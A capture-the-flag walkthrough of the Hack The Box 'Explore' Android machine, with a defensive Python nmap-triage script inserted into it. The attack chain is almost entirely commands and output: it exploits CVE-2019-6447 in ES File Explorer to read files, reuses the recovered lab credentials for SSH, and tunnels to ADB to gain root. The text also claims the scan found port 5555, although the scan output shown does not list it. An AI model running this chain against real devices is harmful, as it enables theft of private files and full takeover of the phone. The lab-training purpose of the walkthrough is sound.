
nihilist - 20 / 11 / 2022

Explore Writeup

Introduction :



Explore is an easy Android box released back in June 2021.

Part 1 : Initial Enumeration



As always, we begin our enumeration with Nmap to find open ports.
We use the flags -sC for default scripts and -sV for version detection.


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ nmap -sCV -p- explore.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 12:49 UTC
Nmap scan report for explore.htb (10.129.17.72)
Host is up (0.71s latency).

PORT      STATE  SERVICE VERSION
2222/tcp  open   ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
42135/tcp open   http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: ES Name Response Server
45141/tcp closed unknown
59777/tcp open   http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.92%I=7%D=11/20%Time=637A2270%P=x86_64-pc-linux-gnu%r(N
SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
Service Info: Device: phone
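The same scan output is useful from the other side of the fence: an asset owner who finds these ports on a phone in their network wants them flagged automatically. The script below is an added example, not part of the original writeup or of any tool it uses. It parses the port table of a plain nmap report (the sample is the scan above, embedded as constructed test input), attaches NSE script lines to the port they belong to, and flags the Android services this box exposes. The table of risky ports and banners is my own assumption of what to alert on; note that nmap's service guess on 59777 ("Bukkit JSONAPI") is wrong, so the port number rather than the guessed service name is used as the signal.

```python
import re

# Constructed sample input: the port table from the nmap scan above,
# used here as an offline input for the triage function.
SAMPLE_NMAP = """\
PORT      STATE  SERVICE VERSION
2222/tcp  open   ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
42135/tcp open   http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: ES Name Response Server
45141/tcp closed unknown
59777/tcp open   http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
Service Info: Device: phone
"""

# One nmap port line: "<port>/<proto>  <state>  <service>  <version...>"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\w+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

# Assumed alert table (not from the writeup): Android services that should
# never be reachable from the network, keyed by their default port.
RISKY_PORTS = {
    5555: "Android Debug Bridge (adbd) reachable over TCP",
    42135: "ES File Explorer name-response service (the app is installed and running)",
    59777: "ES File Explorer HTTP server (CVE-2019-6447: device storage readable over HTTP)",
}

# Banner fragments that identify the same services on a non-default port.
# Matched against the version column and the NSE script output of that port.
RISKY_BANNERS = ("ES File Explorer", "ES Name Response Server", "Android Debug Bridge")


def parse_ports(nmap_output):
    """Return one dict per port line; NSE script lines are attached to their port."""
    ports = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line)
        if m:
            entry = m.groupdict()
            entry["port"] = int(entry["port"])
            entry["scripts"] = []
            ports.append(entry)
        elif line.startswith("|") and ports:
            # Lines starting with "|" or "|_" are NSE output for the previous port.
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports


def triage(nmap_output):
    """Flag open ports that expose Android debug or file-sharing services."""
    findings = []
    for p in parse_ports(nmap_output):
        if p["state"] != "open":
            continue  # closed/filtered ports are not an exposure
        reason = RISKY_PORTS.get(p["port"])
        if reason is None:
            haystack = " ".join([p["version"]] + p["scripts"])
            hit = next((b for b in RISKY_BANNERS if b in haystack), None)
            if hit:
                reason = f"banner matched '{hit}' on a non-default port"
        if reason:
            findings.append({"port": p["port"], "service": p["service"], "reason": reason})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_NMAP):
        print(f"{f['port']}/tcp ({f['service']}): {f['reason']}")
```

Run against the scan above it reports 42135 and 59777 and stays quiet about the SSH port; a line such as `5555/tcp open freeciv` (nmap's default name for that port) is flagged as ADB purely by port number.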

Part 2 : Getting User Access



Our nmap scan picked up an HTTP service on port 59777, so let's investigate it using gobuster:


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ gobuster dir -u http://explore.htb:59777 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://explore.htb:59777
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/20 12:42:26 Starting gobuster in directory enumeration mode
===============================================================
/product              (Status: 301) [Size: 71] [--> /product/]
/data                 (Status: 301) [Size: 65] [--> /data/]
/d                    (Status: 301) [Size: 59] [--> /d/]
/bin                  (Status: 301) [Size: 63] [--> /bin/]
/storage              (Status: 301) [Size: 71] [--> /storage/]
/system               (Status: 301) [Size: 69] [--> /system/]
/lib                  (Status: 301) [Size: 63] [--> /lib/]
/dev                  (Status: 301) [Size: 63] [--> /dev/]
/cache                (Status: 301) [Size: 67] [--> /cache/]
/etc                  (Status: 301) [Size: 63] [--> /etc/]
/vendor               (Status: 301) [Size: 69] [--> /vendor/]
/config               (Status: 301) [Size: 69] [--> /config/]
/oem                  (Status: 301) [Size: 63] [--> /oem/]
/%20                  (Status: 403) [Size: 32]
/sys                  (Status: 301) [Size: 63] [--> /sys/]
/init                 (Status: 403) [Size: 31]

Browsing to it doesn't show much either:

However, looking back at our nmap scan, it also picked up port 42135 as "ES File Explorer", so we look at the available exploits for it:


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ findsploit  es file explorer
   ___ _           _           _       _ _
  / __(_)_ __   __| |___ _ __ | | ___ (_) |_
 / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|
/ /   | | | | | (_| \__ \ |_) | | (_) | | |_
\/    |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|
                        |_|

 + -- --=[ findsploit v2.0 by @xer0dayz
 + -- --=[ https://sn1persecurity.com

 + -- --=[ SEARCHING:  es file explorer

 + -- --=[ NMAP SCRIPTS

egrep: warning: egrep is obsolescent; using grep -E
egrep: warning: egrep is obsolescent; using grep -E
egrep: warning: egrep is obsolescent; using grep -E

 + -- --=[ METASPLOIT EXPLOIT S

egrep: warning: egrep is obsolescent; using grep -E
egrep: warning: egrep is obsolescent; using grep -E
egrep: warning: egrep is obsolescent; using grep -E
   378   gather/ie_sandbox_findfiles                                    2016-08-09       normal  No     Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability
   550   scanner/http/es_file_explorer_open_port                        2019-01-16       normal  No     ES File Explorer Open Port

 + -- --=[ EXPLOITDB EXPLOITS

------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
ES File Explorer 4.1.9.7.4 - Arbitrary File Read                                           | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal                                               | ios/remote/16278.py
MetaProducts Offline Explorer 1.x - FileSystem Disclosure                                  | windows/remote/20488.txt
Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)    | windows/remote/3808.html
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)        | windows/remote/24495.rb
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)        | windows/remote/24538.rb
Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)              | windows/remote/25999.rb
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)                               | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File  | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame A | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptl | windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass                            | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution                             | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access                                          | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)                          | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities                                  | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection                                        | php/webapps/35851.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

https://www.exploit-db.com/search?q=es+file+explorer
https://www.google.ca/search?q=es%20file%20explorer+exploit
https://www.google.ca/search?q=es%20file%20explorer+exploit+site:www.securityfocus.com
https://www.google.ca/search?q=es%20file%20explorer+site:0day.today
https://www.google.ca/search?q=es%20file%20explorer+site:www.security-database.com
https://www.google.ca/search?q=es%20file%20explorer+site:packetstormsecurity.com
https://exploits.shodan.io/?q=es+file+explorer
https://vulners.com/search?query=es+file+explorer

 + -- --=[ Press any key to search online or Ctrl+C to exit...


Here we find an exploit for CVE-2019-6447, an arbitrary file read in ES File Explorer, so let's try it out:


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ cp $(locate 50070.py) .

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ vim 50070.py

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ python 50070.py help explore.htb
[-] WRONG COMMAND!
Available commands :
  listFiles         : List all Files.
  listPics          : List all Pictures.
  listVideos        : List all videos.
  listAudios        : List all audios.
  listApps          : List Applications installed.
  listAppsSystem    : List System apps.
  listAppsPhone     : List Communication related apps.
  listAppsSdcard    : List apps on the SDCard.
  listAppsAll       : List all Application.
  getFile           : Download a file.
  getDeviceInfo     : Get device info.

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ python 50070.py listPics explore.htb

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

Here, the creds.jpg file looks interesting, so let's download it:


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ wget http://explore.htb:59777/storage/emulated/0/DCIM/creds.jpg

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ file creds.jpg
creds.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [\012- TIFF image data, big-endian, direntries=12, manufacturer=Apple, model=iPhone XR, orientation=upper-right, xresolution=174, yresolution=182, resolutionunit=2, software=14.4, datetime=2021:03:06 02:13:37, hostcomputer=iPhone XR, GPS-Data], comment: "Optimized by JPEGmini 3.18.2.210033067-TBTBLN 0x905c306b", baseline, precision 8, 4032x3024, components 3

In it we find credentials:

So from here we can log in as the kristi user with her password "Kr1sT!5h@Rp3xPl0r3!". The first attempt fails because recent OpenSSH versions disable the SHA-1-based ssh-rsa host key algorithm by default, so we re-enable it for this host only in ~/.ssh/config:


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@explore.htb
Unable to negotiate with 10.129.17.72 port 2222: no matching host key type found. Their offer: ssh-rsa

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ vim ~/.ssh/config

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ cat ~/.ssh/config| head -n6
Host explore
    HostName explore.htb
    User kristi
    PubkeyAcceptedAlgorithms +ssh-rsa
        HostkeyAlgorithms +ssh-rsa
        Port 2222

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ sshpub explore
The authenticity of host '[explore.htb]:2222 ([10.129.17.72]:2222)' can't be established.
RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[explore.htb]:2222' (RSA) to the list of known hosts.
Password authentication
(kristi@explore.htb) Password:
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768

Once logged in, we find the user flag in the /sdcard directory:


:/ $ ls
acct                   init.superuser.rc       sbin
bin                    init.usb.configfs.rc    sdcard
bugreports             init.usb.rc             sepolicy
cache                  init.zygote32.rc        storage
charger                init.zygote64_32.rc     sys
config                 lib                     system
d                      mnt                     ueventd.android_x86_64.rc
data                   odm                     ueventd.rc
default.prop           oem                     vendor
dev                    plat_file_contexts      vendor_file_contexts
etc                    plat_hwservice_contexts vendor_hwservice_contexts
fstab.android_x86_64   plat_property_contexts  vendor_property_contexts
init                   plat_seapp_contexts     vendor_seapp_contexts
init.android_x86_64.rc plat_service_contexts   vendor_service_contexts
init.environ.rc        proc                    vndservice_contexts
init.rc                product
:/ $ cd sdcard/
:/sdcard $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt
Android Download Music  Pictures      Ringtones dianxinos
:/sdcard $ cat user.txt
f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And we got the user flag!

Part 3 : Getting Root Access



Now, in order to privesc, we look back at our nmap scan, which picked up port 5555. This port is usually used by the Android Debug Bridge (adb), so let's try to connect to it:


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ adb connect explore.htb:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
^C

This doesn't work, because adb is usually used to debug an Android phone locally, so let's forward port 5555 through our SSH connection:


[term1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ sshpub -p 2222 -L 5555:localhost:5555 explore
Password authentication
(kristi@explore.htb) Password:
:/ $

[term2]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ adb connect 127.0.0.1:5555
connected to 127.0.0.1:5555

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ adb root
restarting adbd as root

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ adb shell
x86_64:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:su:s0
x86_64:/ # cat /data/root.txt
f0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to get the root flag.

Conclusion



Here we can see the progress graph :